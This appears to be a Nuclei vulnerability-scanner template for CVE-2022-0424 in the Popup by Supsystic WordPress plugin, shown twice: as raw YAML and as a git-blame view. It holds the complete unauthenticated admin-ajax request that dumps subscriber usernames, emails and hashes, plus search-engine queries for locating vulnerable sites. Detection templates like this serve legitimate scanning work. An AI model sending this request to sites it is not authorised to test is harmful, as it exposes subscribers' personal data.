nuclei-templates/http/cves/2022/CVE-2022-0424.yaml

id: CVE-2022-0424

info:
  name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
  author: Kazgangap
  severity: medium
  description: |
    The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
  remediation: Fixed in 1.10.9
  reference:
    - https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-0424
    cwe-id: CWE-306
    epss-score: 0.01488
    epss-percentile: 0.86805
    cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: supsystic
    product: popup
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/popup-by-supsystic
    fofa-query: body=/wp-content/plugins/popup-by-supsystic
    publicwww-query: "/wp-content/plugins/popup-by-supsystic"
  tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"id":"'
          - 'username":"'
          - 'email":'
          - 'hash":"'
          - '_wpnonce'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ae353cf33f8d15e38265c2427ecce8e3066f6773a07cfe3c63352f886f6b8424022100b95faab2e54951afdeb5de9b658305b20c7c8d0e846ea7088c2bd6b1e8cc3746:922c64590222798bb761d5b6d8e72950
add cve-2022-0424 2024-04-10 19:54:34 +00:00			`id: CVE-2022-0424`
updated matchers, info & req type 2024-04-11 04:40:31 +00:00
add cve-2022-0424 2024-04-10 19:54:34 +00:00			`info:`
updated matchers, info & req type 2024-04-11 04:40:31 +00:00			`name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure`
add cve-2022-0424 2024-04-10 19:54:34 +00:00			`author: Kazgangap`
			`severity: medium`
			`description: \|`
			`The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users`
minor update 2024-04-11 06:48:18 +00:00			`remediation: Fixed in 1.10.9`
add cve-2022-0424 2024-04-10 19:54:34 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/`
updated matchers, info & req type 2024-04-11 04:40:31 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-0424`
add cve-2022-0424 2024-04-10 19:54:34 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`
			`cvss-score: 5.3`
			`cve-id: CVE-2022-0424`
			`cwe-id: CWE-306`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`epss-score: 0.01488`
			`epss-percentile: 0.86805`
add cve-2022-0424 2024-04-10 19:54:34 +00:00			`cpe: cpe:2.3:a:supsystic:popup::::::wordpress::*`
			`metadata:`
updated matchers, info & req type 2024-04-11 04:40:31 +00:00			`verified: true`
			`max-request: 1`
add cve-2022-0424 2024-04-10 19:54:34 +00:00			`vendor: supsystic`
			`product: popup`
			`framework: wordpress`
product/queries updated 2024-05-31 19:23:20 +00:00			`shodan-query: http.html:/wp-content/plugins/popup-by-supsystic`
			`fofa-query: body=/wp-content/plugins/popup-by-supsystic`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`publicwww-query: "/wp-content/plugins/popup-by-supsystic"`
			`tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic`
add cve-2022-0424 2024-04-10 19:54:34 +00:00
			`http:`
updated matchers, info & req type 2024-04-11 04:40:31 +00:00			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`

			`page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10`

add cve-2022-0424 2024-04-10 19:54:34 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
updated matchers, info & req type 2024-04-11 04:40:31 +00:00			`- '"id":"'`
			`- 'username":"'`
			`- 'email":'`
			`- 'hash":"'`
			`- '_wpnonce'`
			`condition: and`

add cve-2022-0424 2024-04-10 19:54:34 +00:00			`- type: status`
			`status:`
updated matchers, info & req type 2024-04-11 04:40:31 +00:00			`- 200`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4b0a00483046022100ae353cf33f8d15e38265c2427ecce8e3066f6773a07cfe3c63352f886f6b8424022100b95faab2e54951afdeb5de9b658305b20c7c8d0e846ea7088c2bd6b1e8cc3746:922c64590222798bb761d5b6d8e72950`